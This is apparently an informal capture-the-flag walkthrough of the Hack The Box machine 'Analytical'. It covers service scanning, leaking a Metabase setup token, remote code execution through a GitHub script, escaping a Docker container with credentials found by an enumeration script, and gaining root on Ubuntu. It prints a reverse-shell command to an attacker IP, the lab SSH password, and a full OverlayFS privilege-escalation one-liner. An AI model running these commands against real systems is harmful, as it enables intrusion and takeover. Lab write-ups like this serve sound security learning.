80/tcp open  http    nginx 1.18.0 (Ubuntu)

| http-methods:

|_  Supported Methods: GET HEAD POST OPTIONS

|_http-title: Did not follow redirect to http://analytical.htb/

|_http-server-header: nginx/1.18.0 (Ubuntu)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Couple things to add to /etc/hosts we find the data subdomain because thats the login page
 

analytical.htb

data.analytical.htb

analytical.htb dirbuster

/images               (Status: 301) [Size: 178] [--> http://analytical.htb/images/]

/js                   (Status: 301) [Size: 178] [--> http://analytical.htb/js/]

/index.html           (Status: 200) [Size: 17169]

/css                  (Status: 301) [Size: 178] [--> http://analytical.htb/css/]

Names found

Jonnhy Smith

Alex Kirigo

Daniel Walker

Email format

[email protected]
 

intercepting the reset password link with burpsuite on the login page gives us a ton of data

username found camsaul

/home/camsaul/toucan_sightings.sqlite

we find this cookie in the output from above but i cant seem to do anything with it

analytics-uuid":"a9f05e66-ef41-4811-a644-fde212051d7e"

metabase.DEVICE=a9f05e66-ef41-4811-a644-fde212051d7e

setup-token":249fa03d-fd94-4d5b-b94f-b4ebf3df681f

data.analytical.htb/app/assets/img/site.webmanifest

Using a script we find on github we can get rce. This script requires a setup token which we found in that interesting.txt file from burp suite
 

or at http://data.analytical.htb/api/session/properties
 

python3 main.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "bash -i >& /dev/tcp/10.10.14.20/9999 0>&1"

We are trapped in a docker container.
 

I spent days searching through every file and every directory without finding anything. I tried so many different things but nothing worked. 
 

UNTIL I find a cool enumeration script for docker(https://github.com/stealthcopter/deepce/blob/main/deepce.sh)
 

The script finds creds that we can use for ssh and we are no longer in the docker container.
 

META_USER=metalytics
 

META_PASS=An4lytics_ds20223#

 

The box is running a version of ubuntu which has a fresh 0 day exploit there are a ton of POCs online the first one i tried worked(from me sshing in it took 30 seconds for me to obtain root as I had been trying to get root in the container with this exploit)
 

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
 

we are root